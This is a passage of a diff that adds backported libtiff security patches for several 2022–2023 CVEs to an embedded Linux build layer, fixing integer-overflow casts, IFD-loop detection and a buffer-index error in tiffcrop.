+@@ -3042,15 +3042,15 @@ TIFFReadRGBATileExt(TIFF* tif, uint32 col, uint32 row, uint32 * raster, int stop
+ return( ok );
+
+ for( i_row = 0; i_row < read_ysize; i_row++ ) {
+- memmove( raster + (tile_ysize - i_row - 1) * tile_xsize,
+- raster + (read_ysize - i_row - 1) * read_xsize,
++ memmove( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize,
++ raster + (size_t)(read_ysize - i_row - 1) * read_xsize,
+ read_xsize * sizeof(uint32) );
+- _TIFFmemset( raster + (tile_ysize - i_row - 1) * tile_xsize+read_xsize,
++ _TIFFmemset( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize+read_xsize,
+ 0, sizeof(uint32) * (tile_xsize - read_xsize) );
+ }
+
+ for( i_row = read_ysize; i_row < tile_ysize; i_row++ ) {
+- _TIFFmemset( raster + (tile_ysize - i_row - 1) * tile_xsize,
++ _TIFFmemset( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize,
+ 0, sizeof(uint32) * tile_xsize );
+ }
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch
new file mode 100644
index 0000000000..0a88f59553
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch
@@ -0,0 +1,548 @@
+From d385738335deb0c4bb70449f12e411f2203c0d01 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 2 Sep 2022 21:20:28 +0200
+Subject: [PATCH 1/4] Improved IFD-Loop Handling (fixes #455)
+
+Basic approach:
+- The order in the entire chain must be checked, and not only whether an offset has already been read once.
+- To do this, pairs of directory number and offset are stored and checked.
+- The offset of a directory number can change.
+- TIFFAdvanceDirectory() must also perform an IFD loop check.
+- TIFFCheckDirOffset() is replaced by _TIFFCheckDirNumberAndOffset().
+
+Rules for the check:
+- If an offset is already in the list, it must have the same IFD number. Otherwise it is an IDF loop.
+- If the offset is not in the list and the IFD number is greater than there are list entries, a new list entry is added.
+- Otherwise, the offset of the IFD number is updated.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2022-40090.patch?h=ubuntu/focal-security
+Upstream commit
+https://gitlab.com/libtiff/libtiff/-/commit/c7caec9a4d8f24c17e667480d2c7d0d51c9fae41]
+CVE: CVE-2022-40090
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_close.c | 6 ++-
+ libtiff/tif_dir.c | 91 +++++++++++++++++++++++++----------------
+ libtiff/tif_dir.h | 1 +
+ libtiff/tif_dirread.c | 94 ++++++++++++++++++++++++++++++-------------
+ libtiff/tif_open.c | 3 +-
+ libtiff/tiffiop.h | 3 +-
+ 6 files changed, 131 insertions(+), 67 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_close.c
++++ tiff-4.1.0+git191117/libtiff/tif_close.c
+@@ -52,8 +52,10 @@ TIFFCleanup(TIFF* tif)
+ (*tif->tif_cleanup)(tif);
+ TIFFFreeDirectory(tif);
+
+- if (tif->tif_dirlist)
+- _TIFFfree(tif->tif_dirlist);
++ if (tif->tif_dirlistoff)
++ _TIFFfree(tif->tif_dirlistoff);
++ if (tif->tif_dirlistdirn)
++ _TIFFfree(tif->tif_dirlistdirn);
+
+ /*
+ * Clean up client info links.
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dir.c
++++ tiff-4.1.0+git191117/libtiff/tif_dir.c
+@@ -1463,12 +1463,22 @@ TIFFDefaultDirectory(TIFF* tif)
+ }
+
+ static int
+-TIFFAdvanceDirectory(TIFF* tif, uint64* nextdir, uint64* off)
++TIFFAdvanceDirectory(TIFF* tif, uint64* nextdiroff, uint64* off, uint16* nextdirnum)
+ {
+ static const char module[] = "TIFFAdvanceDirectory";
++
++ /* Add this directory to the directory list, if not already in. */
++ if (!_TIFFCheckDirNumberAndOffset(tif, *nextdirnum, *nextdiroff)) {
++ TIFFErrorExt(tif->tif_clientdata, module, "Starting directory %hu at offset 0x%lx (%lu) might cause an IFD loop",
++ *nextdirnum, *nextdiroff, *nextdiroff);
++ *nextdiroff = 0;
++ *nextdirnum = 0;
++ return(0);
++ }
++
+ if (isMapped(tif))
+ {
+- uint64 poff=*nextdir;
++ uint64 poff=*nextdiroff;
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+ {
+ tmsize_t poffa,poffb,poffc,poffd;
+@@ -1479,7 +1489,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ if (((uint64)poffa!=poff)||(poffb<poffa)||(poffb<(tmsize_t)sizeof(uint16))||(poffb>tif->tif_size))
+ {
+ TIFFErrorExt(tif->tif_clientdata,module,"Error fetching directory count");
+- *nextdir=0;
++ *nextdiroff=0;
+ return(0);
+ }
+ _TIFFmemcpy(&dircount,tif->tif_base+poffa,sizeof(uint16));
+@@ -1497,7 +1507,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ _TIFFmemcpy(&nextdir32,tif->tif_base+poffc,sizeof(uint32));
+ if (tif->tif_flags&TIFF_SWAB)
+ TIFFSwabLong(&nextdir32);
+- *nextdir=nextdir32;
++ *nextdiroff=nextdir32;
+ }
+ else
+ {
+@@ -1529,11 +1539,10 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ }
+ if (off!=NULL)
+ *off=(uint64)poffc;
+- _TIFFmemcpy(nextdir,tif->tif_base+poffc,sizeof(uint64));
++ _TIFFmemcpy(nextdiroff,tif->tif_base+poffc,sizeof(uint64));
+ if (tif->tif_flags&TIFF_SWAB)
+- TIFFSwabLong8(nextdir);
++ TIFFSwabLong8(nextdiroff);
+ }
+- return(1);
+ }
+ else
+ {
+@@ -1541,7 +1550,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ {
+ uint16 dircount;
+ uint32 nextdir32;
+- if (!SeekOK(tif, *nextdir) ||
++ if (!SeekOK(tif, *nextdiroff) ||
+ !ReadOK(tif, &dircount, sizeof (uint16))) {
+ TIFFErrorExt(tif->tif_clientdata, module, "%s: Error fetching directory count",
+ tif->tif_name);
+@@ -1562,13 +1571,13 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ }
+ if (tif->tif_flags & TIFF_SWAB)
+ TIFFSwabLong(&nextdir32);
+- *nextdir=nextdir32;
++ *nextdiroff=nextdir32;
+ }
+ else
+ {
+ uint64 dircount64;
+ uint16 dircount16;
+- if (!SeekOK(tif, *nextdir) ||
++ if (!SeekOK(tif, *nextdiroff) ||
+ !ReadOK(tif, &dircount64, sizeof (uint64))) {
+ TIFFErrorExt(tif->tif_clientdata, module, "%s: Error fetching directory count",
+ tif->tif_name);
+@@ -1588,17 +1597,27 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ else
+ (void) TIFFSeekFile(tif,
+ dircount16*20, SEEK_CUR);
+- if (!ReadOK(tif, nextdir, sizeof (uint64))) {
++ if (!ReadOK(tif, nextdiroff, sizeof (uint64))) {
+ TIFFErrorExt(tif->tif_clientdata, module,
+ "%s: Error fetching directory link",
+ tif->tif_name);
+ return (0);
+ }
+ if (tif->tif_flags & TIFF_SWAB)
+- TIFFSwabLong8(nextdir);
++ TIFFSwabLong8(nextdiroff);
+ }
+- return (1);
+ }
++ if (*nextdiroff != 0) {
++ (*nextdirnum)++;
++ /* Check next directory for IFD looping and if so, set it as last directory. */
++ if (!_TIFFCheckDirNumberAndOffset(tif, *nextdirnum, *nextdiroff)) {
++ TIFFWarningExt(tif->tif_clientdata, module, "the next directory %hu at offset 0x%lx (%lu) might be an IFD loop. Treating directory %hu as last directory",
++ *nextdirnum, *nextdiroff, *nextdiroff, *nextdirnum-1);
++ *nextdiroff = 0;
++ (*nextdirnum)--;
++ }
++ }
++ return (1);
+ }
+
+ /*
+@@ -1608,14 +1627,16 @@ uint16
+ TIFFNumberOfDirectories(TIFF* tif)
+ {
+ static const char module[] = "TIFFNumberOfDirectories";
+- uint64 nextdir;
++ uint64 nextdiroff;
++ uint16 nextdirnum;
+ uint16 n;
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+- nextdir = tif->tif_header.classic.tiff_diroff;
++ nextdiroff = tif->tif_header.classic.tiff_diroff;
+ else
+- nextdir = tif->tif_header.big.tiff_diroff;
++ nextdiroff = tif->tif_header.big.tiff_diroff;
++ nextdirnum = 0;
+ n = 0;
+- while (nextdir != 0 && TIFFAdvanceDirectory(tif, &nextdir, NULL))
++ while (nextdiroff != 0 && TIFFAdvanceDirectory(tif, &nextdiroff, NULL, &nextdirnum))
+ {
+ if (n != 65535) {
+ ++n;
+@@ -1638,28 +1659,30 @@ TIFFNumberOfDirectories(TIFF* tif)
+ int
+ TIFFSetDirectory(TIFF* tif, uint16 dirn)
+ {
+- uint64 nextdir;
++ uint64 nextdiroff;
++ uint16 nextdirnum;
+ uint16 n;
+
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+- nextdir = tif->tif_header.classic.tiff_diroff;
++ nextdiroff = tif->tif_header.classic.tiff_diroff;
+ else
+- nextdir = tif->tif_header.big.tiff_diroff;
+- for (n = dirn; n > 0 && nextdir != 0; n--)
+- if (!TIFFAdvanceDirectory(tif, &nextdir, NULL))
++ nextdiroff = tif->tif_header.big.tiff_diroff;
++ nextdirnum = 0;
++ for (n = dirn; n > 0 && nextdiroff != 0; n--)
++ if (!TIFFAdvanceDirectory(tif, &nextdiroff, NULL, &nextdirnum))
+ return (0);
+- tif->tif_nextdiroff = nextdir;
++ /* If the n-th directory could not be reached (does not exist),
++ * return here without touching anything further. */
++ if (nextdiroff == 0 || n > 0)
++ return (0);
++
++ tif->tif_nextdiroff = nextdiroff;
+ /*
+ * Set curdir to the actual directory index. The
+ * -1 is because TIFFReadDirectory will increment
+ * tif_curdir after successfully reading the directory.
+ */
+ tif->tif_curdir = (dirn - n) - 1;
+- /*
+- * Reset tif_dirnumber counter and start new list of seen directories.
+- * We need this to prevent IFD loops.
+- */
+- tif->tif_dirnumber = 0;
+ return (TIFFReadDirectory(tif));
+ }
+
+@@ -1672,13 +1695,42 @@ TIFFSetDirectory(TIFF* tif, uint16 dirn)
+ int
+ TIFFSetSubDirectory(TIFF* tif, uint64 diroff)
+ {
+- tif->tif_nextdiroff = diroff;
+- /*
+- * Reset tif_dirnumber counter and start new list of seen directories.
+- * We need this to prevent IFD loops.
++ /* Match nextdiroff and curdir for consistent IFD-loop checking.
++ * Only with TIFFSetSubDirectory() the IFD list can be corrupted with invalid offsets
++ * within the main IFD tree.
++ * In the case of several subIFDs of a main image,
++ * there are two possibilities that are not even mutually exclusive.
++ * a.) The subIFD tag contains an array with all offsets of the subIFDs.
++ * b.) The SubIFDs are concatenated with their NextIFD parameters.
++ * (refer to https://www.awaresystems.be/imaging/tiff/specification/TIFFPM6.pdf.)
+ */
+- tif->tif_dirnumber = 0;
+- return (TIFFReadDirectory(tif));
++ int retval;
++ uint16 curdir = 0;
++ int8 probablySubIFD = 0;
++ if (diroff == 0) {
++ /* Special case to invalidate the tif_lastdiroff member. */
++ tif->tif_curdir = 65535;
++ } else {
++ if (!_TIFFGetDirNumberFromOffset(tif, diroff, &curdir)) {
++ /* Non-existing offsets might point to a SubIFD or invalid IFD.*/
++ probablySubIFD = 1;
++ }
++ /* -1 because TIFFReadDirectory() will increment tif_curdir. */
++ tif->tif_curdir = curdir - 1;
++ }
++
++ tif->tif_nextdiroff = diroff;
++ retval = TIFFReadDirectory(tif);
++ /* If failed, curdir was not incremented in TIFFReadDirectory(), so set it back. */
++ if (!retval )tif->tif_curdir++;
++ if (retval && probablySubIFD) {
++ /* Reset IFD list to start new one for SubIFD chain and also start SubIFD chain with tif_curdir=0. */
++ tif->tif_dirnumber = 0;
++ tif->tif_curdir = 0; /* first directory of new chain */
++ /* add this offset to new IFD list */
++ _TIFFCheckDirNumberAndOffset(tif, tif->tif_curdir, diroff);
++ }
++ return (retval);
+ }
+
+ /*
+@@ -1702,12 +1754,15 @@ TIFFLastDirectory(TIFF* tif)
+
+ /*
+ * Unlink the specified directory from the directory chain.
++ * Note: First directory starts with number dirn=1.
++ * This is different to TIFFSetDirectory() where the first directory starts with zero.
+ */
+ int
+ TIFFUnlinkDirectory(TIFF* tif, uint16 dirn)
+ {
+ static const char module[] = "TIFFUnlinkDirectory";
+ uint64 nextdir;
++ uint16 nextdirnum;
+ uint64 off;
+ uint16 n;
+
+@@ -1731,19 +1786,21 @@ TIFFUnlinkDirectory(TIFF* tif, uint16 di
+ nextdir = tif->tif_header.big.tiff_diroff;
+ off = 8;
+ }
++ nextdirnum = 0; /* First directory is dirn=0 */
++
+ for (n = dirn-1; n > 0; n--) {
+ if (nextdir == 0) {
+ TIFFErrorExt(tif->tif_clientdata, module, "Directory %d does not exist", dirn);
+ return (0);
+ }
+- if (!TIFFAdvanceDirectory(tif, &nextdir, &off))
++ if (!TIFFAdvanceDirectory(tif, &nextdir, &off, &nextdirnum))
+ return (0);
+ }
+ /*
+ * Advance to the directory to be unlinked and fetch
+ * the offset of the directory that follows.
+ */
+- if (!TIFFAdvanceDirectory(tif, &nextdir, NULL))
++ if (!TIFFAdvanceDirectory(tif, &nextdir, NULL, &nextdirnum))
+ return (0);
+ /*
+ * Go back and patch the link field of the preceding
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dir.h
++++ tiff-4.1.0+git191117/libtiff/tif_dir.h
+@@ -300,6 +300,8 @@ extern int _TIFFMergeFields(TIFF*, const
+ extern const TIFFField* _TIFFFindOrRegisterField(TIFF *, uint32, TIFFDataType);
+ extern TIFFField* _TIFFCreateAnonField(TIFF *, uint32, TIFFDataType);
+ extern int _TIFFCheckFieldIsValidForCodec(TIFF *tif, ttag_t tag);
++extern int _TIFFCheckDirNumberAndOffset(TIFF *tif, uint16 dirn, uint64 diroff);
++extern int _TIFFGetDirNumberFromOffset(TIFF *tif, uint64 diroff, uint16 *dirn);
+
+ #if defined(__cplusplus)
+ }
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -158,7 +158,6 @@ static void TIFFReadDirectoryFindFieldIn
+
+ static int EstimateStripByteCounts(TIFF* tif, TIFFDirEntry* dir, uint16 dircount);
+ static void MissingRequired(TIFF*, const char*);
+-static int TIFFCheckDirOffset(TIFF* tif, uint64 diroff);
+ static int CheckDirCount(TIFF*, TIFFDirEntry*, uint32);
+ static uint16 TIFFFetchDirectory(TIFF* tif, uint64 diroff, TIFFDirEntry** pdir, uint64* nextdiroff);
+ static int TIFFFetchNormalTag(TIFF*, TIFFDirEntry*, int recover);
+@@ -3584,12 +3583,19 @@ TIFFReadDirectory(TIFF* tif)
+ int bitspersample_read = FALSE;
+ int color_channels;
+
+- tif->tif_diroff=tif->tif_nextdiroff;
+- if (!TIFFCheckDirOffset(tif,tif->tif_nextdiroff))
+- return 0; /* last offset or bad offset (IFD looping) */
+- (*tif->tif_cleanup)(tif); /* cleanup any previous compression state */
+- tif->tif_curdir++;
+- nextdiroff = tif->tif_nextdiroff;
++ if (tif->tif_nextdiroff == 0) {
++ /* In this special case, tif_diroff needs also to be set to 0. */
++ tif->tif_diroff = tif->tif_nextdiroff;
++ return 0; /* last offset, thus no checking necessary */
++ }
++
++ nextdiroff = tif->tif_nextdiroff;
++ /* tif_curdir++ and tif_nextdiroff should only be updated after SUCCESSFUL reading of the directory. Otherwise, invalid IFD offsets could corrupt the IFD list. */
++ if (!_TIFFCheckDirNumberAndOffset(tif, tif->tif_curdir + 1, nextdiroff)) {
++ TIFFWarningExt(tif->tif_clientdata, module,
++ "Didn't read next directory due to IFD looping at offset 0x%lx (%lu) to offset 0x%lx (%lu)", tif->tif_diroff, tif->tif_diroff, nextdiroff, nextdiroff);
++ return 0; /* bad offset (IFD looping) */
++ }
+ dircount=TIFFFetchDirectory(tif,nextdiroff,&dir,&tif->tif_nextdiroff);
+ if (!dircount)
+ {
+@@ -3597,6 +3603,11 @@ TIFFReadDirectory(TIFF* tif)
+ "Failed to read directory at offset " TIFF_UINT64_FORMAT,nextdiroff);
+ return 0;
+ }
++ /* Set global values after a valid directory has been fetched.
++ * tif_diroff is already set to nextdiroff in TIFFFetchDirectory() in the beginning. */
++ tif->tif_curdir++;
++ (*tif->tif_cleanup)(tif); /* cleanup any previous compression state */
++
+ TIFFReadDirectoryCheckOrder(tif,dir,dircount);
+
+ /*
+@@ -4628,13 +4639,17 @@ MissingRequired(TIFF* tif, const char* t
+ }
+
+ /*
+- * Check the directory offset against the list of already seen directory
+- * offsets. This is a trick to prevent IFD looping. The one can create TIFF
+- * file with looped directory pointers. We will maintain a list of already
+- * seen directories and check every IFD offset against that list.
++ * Check the directory number and offset against the list of already seen
++ * directory numbers and offsets. This is a trick to prevent IFD looping.
++ * The one can create TIFF file with looped directory pointers. We will
++ * maintain a list of already seen directories and check every IFD offset
++ * and its IFD number against that list. However, the offset of an IFD number
++ * can change - e.g. when writing updates to file.
++ * Returns 1 if all is ok; 0 if last directory or IFD loop is encountered,
++ * or an error has occured.
+ */
+-static int
+-TIFFCheckDirOffset(TIFF* tif, uint64 diroff)
++int
++_TIFFCheckDirNumberAndOffset(TIFF* tif, uint16 dirn, uint64 diroff)
+ {
+ uint16 n;
+
+@@ -4646,35 +4661,64 @@ TIFFCheckDirOffset(TIFF* tif, uint64 dir
+ return 0;
+ }
+
+- for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlist; n++) {
+- if (tif->tif_dirlist[n] == diroff)
+- return 0;
++ /* Check if offset is already in the list:
++ * - yes: check, if offset is at the same IFD number - if not, it is an IFD loop
++ * - no: add to list or update offset at that IFD number
++ */
++ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistdirn && tif->tif_dirlistoff; n++) {
++ if (tif->tif_dirlistoff[n] == diroff) {
++ if (tif->tif_dirlistdirn[n] == dirn) {
++ return 1;
++ } else {
++ TIFFWarningExt(tif->tif_clientdata, "_TIFFCheckDirNumberAndOffset",
++ "TIFF directory %hu has IFD looping to directory %hu at offset 0x%lx (%lu)",
++ dirn-1, tif->tif_dirlistdirn[n], diroff, diroff);
++ return 0;
++ }
++ }
++ }
++ /* Check if offset of an IFD has been changed and update offset of that IFD number. */
++ if (dirn < tif->tif_dirnumber && tif->tif_dirlistdirn && tif->tif_dirlistoff) {
++ /* tif_dirlistdirn can have IFD numbers dirn in random order */
++ for (n = 0; n < tif->tif_dirnumber; n++) {
++ if (tif->tif_dirlistdirn[n] == dirn) {
++ tif->tif_dirlistoff[n] = diroff;
++ return 1;
++ }
++ }
+ }
+
++ /* Add IFD offset and dirn to IFD directory list */
+ tif->tif_dirnumber++;
+
+- if (tif->tif_dirlist == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
+- uint64* new_dirlist;
+-
++ if (tif->tif_dirlistoff == NULL || tif->tif_dirlistdirn == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
++ uint64 *new_dirlist;
+ /*
+ * XXX: Reduce memory allocation granularity of the dirlist
+ * array.
+ */
+- new_dirlist = (uint64*)_TIFFCheckRealloc(tif, tif->tif_dirlist,
+- tif->tif_dirnumber, 2 * sizeof(uint64), "for IFD list");
++ if (tif->tif_dirnumber >= 32768)
++ tif->tif_dirlistsize = 65535;
++ else
++ tif->tif_dirlistsize = 2 * tif->tif_dirnumber;
++
++ new_dirlist = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistoff,
++ tif->tif_dirlistsize, sizeof(uint64), "for IFD offset list");
+ if (!new_dirlist)
+ return 0;
+- if( tif->tif_dirnumber >= 32768 )
+- tif->tif_dirlistsize = 65535;
+- else
+- tif->tif_dirlistsize = 2 * tif->tif_dirnumber;
+- tif->tif_dirlist = new_dirlist;
++ tif->tif_dirlistoff = new_dirlist;
++ new_dirlist = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistdirn,
++ tif->tif_dirlistsize, sizeof(uint16), "for IFD dirnumber list");
++ if (!new_dirlist)
++ return 0;
++ tif->tif_dirlistdirn = (uint16 *)new_dirlist;
+ }
+
+- tif->tif_dirlist[tif->tif_dirnumber - 1] = diroff;
++ tif->tif_dirlistoff[tif->tif_dirnumber - 1] = diroff;
++ tif->tif_dirlistdirn[tif->tif_dirnumber - 1] = dirn;
+
+ return 1;
+-}
++} /* --- _TIFFCheckDirNumberAndOffset() ---*/
+
+ /*
+ * Check the count field of a directory entry against a known value. The
+@@ -4703,6 +4747,47 @@ CheckDirCount(TIFF* tif, TIFFDirEntry* d
+ }
+
+ /*
++ * Retrieve the matching IFD directory number of a given IFD offset
++ * from the list of directories already seen.
++ * Returns 1 if the offset was in the list and the directory number
++ * can be returned.
++ * Otherwise returns 0 or if an error occured.
++ */
++int
++_TIFFGetDirNumberFromOffset(TIFF *tif, uint64 diroff, uint16* dirn)
++{
++ uint16 n;
++
++ if (diroff == 0) /* no more directories */
++ return 0;
++ if (tif->tif_dirnumber == 65535) {
++ TIFFErrorExt(tif->tif_clientdata, "_TIFFGetDirNumberFromOffset",
++ "Cannot handle more than 65535 TIFF directories");
++ return 0;
++ }
++
++ /* Check if offset is already in the list and return matching directory number.
++ * Otherwise update IFD list using TIFFNumberOfDirectories()
++ * and search again in IFD list.
++ */
++ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistoff && tif->tif_dirlistdirn; n++) {
++ if (tif->tif_dirlistoff[n] == diroff) {
++ *dirn = tif->tif_dirlistdirn[n];
++ return 1;
++ }
++ }
++ TIFFNumberOfDirectories(tif);
++ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistoff && tif->tif_dirlistdirn; n++) {
++ if (tif->tif_dirlistoff[n] == diroff) {
++ *dirn = tif->tif_dirlistdirn[n];
++ return 1;
++ }
++ }
++ return 0;
++} /*--- _TIFFGetDirNumberFromOffset() ---*/
++
++
++/*
+ * Read IFD structure from the specified offset. If the pointer to
+ * nextdiroff variable has been specified, read it too. Function returns a
+ * number of fields in the directory or 0 if failed.
+--- tiff-4.1.0+git191117.orig/libtiff/tif_open.c
++++ tiff-4.1.0+git191117/libtiff/tif_open.c
+@@ -353,7 +353,8 @@ TIFFClientOpen(
+ if (!TIFFDefaultDirectory(tif))
+ goto bad;
+ tif->tif_diroff = 0;
+- tif->tif_dirlist = NULL;
++ tif->tif_dirlistoff = NULL;
++ tif->tif_dirlistdirn = NULL;
+ tif->tif_dirlistsize = 0;
+ tif->tif_dirnumber = 0;
+ return (tif);
+--- tiff-4.1.0+git191117.orig/libtiff/tiffiop.h
++++ tiff-4.1.0+git191117/libtiff/tiffiop.h
+@@ -145,7 +145,8 @@ struct tiff {
+ #define TIFF_CHOPPEDUPARRAYS 0x4000000U /* set when allocChoppedUpStripArrays() has modified strip array */
+ uint64 tif_diroff; /* file offset of current directory */
+ uint64 tif_nextdiroff; /* file offset of following directory */
+- uint64* tif_dirlist; /* list of offsets to already seen directories to prevent IFD looping */
++ uint64* tif_dirlistoff; /* list of offsets to already seen directories to prevent IFD looping */
++ uint16* tif_dirlistdirn; /* list of directory numbers to already seen directories to prevent IFD looping */
+ uint16 tif_dirlistsize; /* number of entries in offset list */
+ uint16 tif_dirnumber; /* number of already seen directories */
+ TIFFDirectory tif_dir; /* internal rep of current directory */
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch
new file mode 100644
index 0000000000..5747202bd9
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch
@@ -0,0 +1,26 @@
+From 424c82b5b33256e7f03faace51dc8010f3ded9ff Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Sat, 21 Jan 2023 15:58:10 +0000
+Subject: [PATCH] tiffcrop: Correct simple copy paste error. Fix #488.
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz]
+CVE: CVE-2022-48281
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ tools/tiffcrop.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index a0789a3..8aed9cd 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7564,7 +7564,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ else
+ {
+- prev_cropsize = seg_buffs[0].size;
++ prev_cropsize = seg_buffs[i].size;
+ if (prev_cropsize < cropsize)
+ {
+ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch
new file mode 100644
index 0000000000..253018525a
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch
@@ -0,0 +1,157 @@
+From 7808740e100ba30ffb791044f3b14dec3e85ed6f Mon Sep 17 00:00:00 2001
+From: Markus Koschany <apo@debian.org>
+Date: Tue, 21 Feb 2023 14:26:43 +0100
+Subject: [PATCH] CVE-2023-0795
+
+This is also the fix for CVE-2023-0796, CVE-2023-0797, CVE-2023-0798,
+CVE-2023-0799.
+
+Bug-Debian: https://bugs.debian.org/1031632
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/afaabc3e50d4e5d80a94143f7e3c997e7e410f68
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2023-0795 CVE-2023-0796 CVE-2023-0797 CVE-2023-0798 CVE-2023-0799
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiffcrop.c | 51 ++++++++++++++++++++++++++++--------------------
+ 1 file changed, 30 insertions(+), 21 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 8aed9cd..f21a7d7 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -277,7 +277,6 @@ struct region {
+ uint32 width; /* width in pixels */
+ uint32 length; /* length in pixels */
+ uint32 buffsize; /* size of buffer needed to hold the cropped region */
+- unsigned char *buffptr; /* address of start of the region */
+ };
+
+ /* Cropping parameters from command line and image data
+@@ -532,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
+ uint32, uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+- unsigned char **);
++ unsigned char **, int);
+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -5112,7 +5111,6 @@ initCropMasks (struct crop_mask *cps)
+ cps->regionlist[i].width = 0;
+ cps->regionlist[i].length = 0;
+ cps->regionlist[i].buffsize = 0;
+- cps->regionlist[i].buffptr = NULL;
+ cps->zonelist[i].position = 0;
+ cps->zonelist[i].total = 0;
+ }
+@@ -6358,8 +6356,13 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
+ image->adjustments & ROTATE_ANY);
+ return (-1);
+ }
+-
+- if (rotateImage(rotation, image, &image->width, &image->length, work_buff_ptr))
++
++ /* Dummy variable in order not to switch two times the
++ * image->width,->length within rotateImage(),
++ * but switch xres, yres there. */
++ uint32_t width = image->width;
++ uint32_t length = image->length;
++ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, TRUE))
+ {
+ TIFFError ("correct_orientation", "Unable to rotate image");
+ return (-1);
+@@ -6427,7 +6430,6 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ /* These should not be needed for composite images */
+ crop->regionlist[i].width = crop_width;
+ crop->regionlist[i].length = crop_length;
+- crop->regionlist[i].buffptr = crop_buff;
+
+ src_rowsize = ((img_width * bps * spp) + 7) / 8;
+ dst_rowsize = (((crop_width * bps * count) + 7) / 8);
+@@ -6664,7 +6666,6 @@ extractSeparateRegion(struct image_data *image, struct crop_mask *crop,
+
+ crop->regionlist[region].width = crop_width;
+ crop->regionlist[region].length = crop_length;
+- crop->regionlist[region].buffptr = crop_buff;
+
+ src = read_buff;
+ dst = crop_buff;
+@@ -7542,7 +7543,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, &crop_buff))
++ &crop->combined_length, &crop_buff, FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7648,7 +7649,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->regionlist[i].width,
+- &crop->regionlist[i].length, &crop_buff))
++ &crop->regionlist[i].length, &crop_buff, FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7780,7 +7781,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
